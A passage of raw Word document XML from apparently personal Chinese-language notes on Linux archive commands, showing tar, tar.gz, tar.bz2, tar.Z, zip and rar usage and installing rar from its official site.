          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD18E5" w14:textId="19373C2F" w:rsidR="00F72473" w:rsidRDefault="00F72473" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>tar -</w:t>
      </w:r>
      <w:r w:rsidR="007D2FA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00A40C39">
        <w:t>vf</w:t>
      </w:r>
      <w:r w:rsidR="00B34A87">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="006B5D10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r w:rsidR="006B5D10">
        <w:t>get.</w:t>
      </w:r>
      <w:r>
        <w:t>tar NeedToPack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F684CA6" w14:textId="1CC5260E" w:rsidR="0098025A" w:rsidRDefault="00B63C14" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8AADCC" w14:textId="563A1BA9" w:rsidR="0098025A" w:rsidRDefault="0098025A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000B6A58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E481F8" w14:textId="1410BDC0" w:rsidR="00F72473" w:rsidRDefault="00F72473" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ar -xvf NeedToPack.tar</w:t>
      </w:r>
      <w:r w:rsidR="004909CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268B9B4" w14:textId="63A1C6E2" w:rsidR="00C83194" w:rsidRDefault="00C83194" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83194">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>指定解压目录则指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00C83194">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C83194">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83194">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指定解压目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6A58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6A58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6A58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是大写的</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6A58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6A58">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，否则会报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B55EA" w14:textId="77777777" w:rsidR="00F72473" w:rsidRDefault="00F72473" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEC90B8" w14:textId="53CDFE1B" w:rsidR="00930B06" w:rsidRDefault="00930B06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处常用的选项有以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接可以打包或者解包为</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:t>ar.gz</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:t>ar.bz2</w:t>
      </w:r>
      <w:r w:rsidR="00D23DB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，分别是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78ADFF" w14:textId="77777777" w:rsidR="00930B06" w:rsidRDefault="00930B06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：压缩和解压缩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ".tar.gz" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F6DB2" w14:textId="42B7F098" w:rsidR="00930B06" w:rsidRDefault="00930B06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：压缩和解压缩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ".tar.bz2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791A5B7" w14:textId="77777777" w:rsidR="00930B06" w:rsidRDefault="00930B06" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9A73C5" w14:textId="72BF14FD" w:rsidR="004E5F9B" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc159779679"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t>.g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00523065">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或</w:t>
      </w:r>
      <w:r w:rsidR="00523065">
        <w:t>.tgz</w:t>
      </w:r>
      <w:r w:rsidR="00523065">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的压缩与解压缩</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="085DF651" w14:textId="7299CE31" w:rsidR="00E759DF" w:rsidRDefault="003F397C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F397C">
        <w:t>tar -xzf all.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A300E2D" w14:textId="657EE9C0" w:rsidR="003F397C" w:rsidRDefault="003F397C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F397C">
        <w:t>tar -czf all.tar.gz *.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274B805" w14:textId="77777777" w:rsidR="003F397C" w:rsidRDefault="003F397C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524702B0" w14:textId="77777777" w:rsidR="003F397C" w:rsidRPr="00523065" w:rsidRDefault="003F397C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2F2A27" w14:textId="13DFD950" w:rsidR="00E759DF" w:rsidRDefault="00B16040" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="220" w:name="_Toc159779680"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t>.bz2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的压缩与解压缩</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="3C77834E" w14:textId="77777777" w:rsidR="00B16040" w:rsidRDefault="00B16040" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095A14C8" w14:textId="769EBF90" w:rsidR="00B16040" w:rsidRPr="00B16040" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar -xjvf file.tar.bz2 //</w:t>
      </w:r>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压</w:t>
      </w:r>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tar.bz2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D659AEB" w14:textId="1D2D9D59" w:rsidR="00E759DF" w:rsidRDefault="00993814" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tar </w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cjf jpg.tar.bz2 *.jpg //</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将目录里所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件打包成</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jpg.tar</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，并且将其用</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bzip2</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩，生成一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bzip2</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩过的包，命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00993814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jpg.tar.bz2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F63941" w14:textId="77777777" w:rsidR="00B16040" w:rsidRDefault="00B16040" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E51020" w14:textId="77777777" w:rsidR="00B16040" w:rsidRDefault="00B16040" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7D7E37" w14:textId="7CF4C70C" w:rsidR="00720987" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc159779681"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t>.Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的压缩与解压缩</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
    </w:p>
    <w:p w14:paraId="5FCB711A" w14:textId="77777777" w:rsidR="00720987" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247660C8" w14:textId="077B6B52" w:rsidR="00720987" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tar </w:t>
      </w:r>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xZvf file.tar.Z //</w:t>
      </w:r>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压</w:t>
      </w:r>
      <w:r w:rsidRPr="00720987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar.Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4FCF8" w14:textId="77777777" w:rsidR="00720987" w:rsidRPr="00720987" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEA264E" w14:textId="77777777" w:rsidR="00720987" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677E78B4" w14:textId="77777777" w:rsidR="00720987" w:rsidRDefault="00720987" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B601E0D" w14:textId="4FE01F3D" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="_Toc159779682"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的压缩与解压缩</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="627A5444" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRPr="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1794A042" w14:textId="0A585F21" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩服务器上当前目录的内容为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6553A4" w14:textId="3BD4B953" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>zip -r xxx.zip ./*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D55EF7E" w14:textId="3AFEF92B" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> zip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令同时处理多个文件和目录，方法是将它们逐一列出，并用空格间隔：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB67879" w14:textId="44D1ADA2" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>zip -r filename.zip file1 file2 file3 /usr/work/school</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB53C24" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECEAF20" w14:textId="543B8489" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件到当前目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2122A9" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>unzip filename.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A751FC8" w14:textId="77777777" w:rsidR="00E759DF" w:rsidRDefault="00E759DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AD9EF8" w14:textId="3E971681" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc159779683"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>ar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的压缩与解压缩</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="3DB459FD" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B453C6" w14:textId="424B8C39" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA0EF9A" w14:textId="0BEF22FC" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中默认不带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，需要自行安装，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RARLAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到自己系统位数对应链接下载直接编译即可，如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B14D6E4" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRPr="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3F76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>wget https://www.rarlab.com/rar/rarlinux-x64-5.6.1.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984AA8B" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRPr="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3F76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tar -zxvf rarlinux-x64-5.6.1.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618F556F" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRPr="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3F76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cd rar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782DFFC" w14:textId="4C664EF0" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F3F76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9BAFD" w14:textId="0BEC7B30" w:rsidR="00010C16" w:rsidRDefault="00010C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或另</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BF63D" w14:textId="3FBF6606" w:rsidR="00010C16" w:rsidRPr="00010C16" w:rsidRDefault="00010C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00010C16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>安装：</w:t>
      </w:r>
      <w:r w:rsidRPr="00010C16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo apt-get install unrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE34B7B" w14:textId="4972449F" w:rsidR="005F3F76" w:rsidRDefault="00010C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00010C16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>卸载：</w:t>
      </w:r>
      <w:r w:rsidRPr="00010C16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo apt-get remove unrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42624F9D" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4D3A37" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压缩文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF33A3" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>rar a -r test.rar file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CBE05" w14:textId="77777777" w:rsidR="005F3F76" w:rsidRDefault="005F3F76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压文件</w:t>
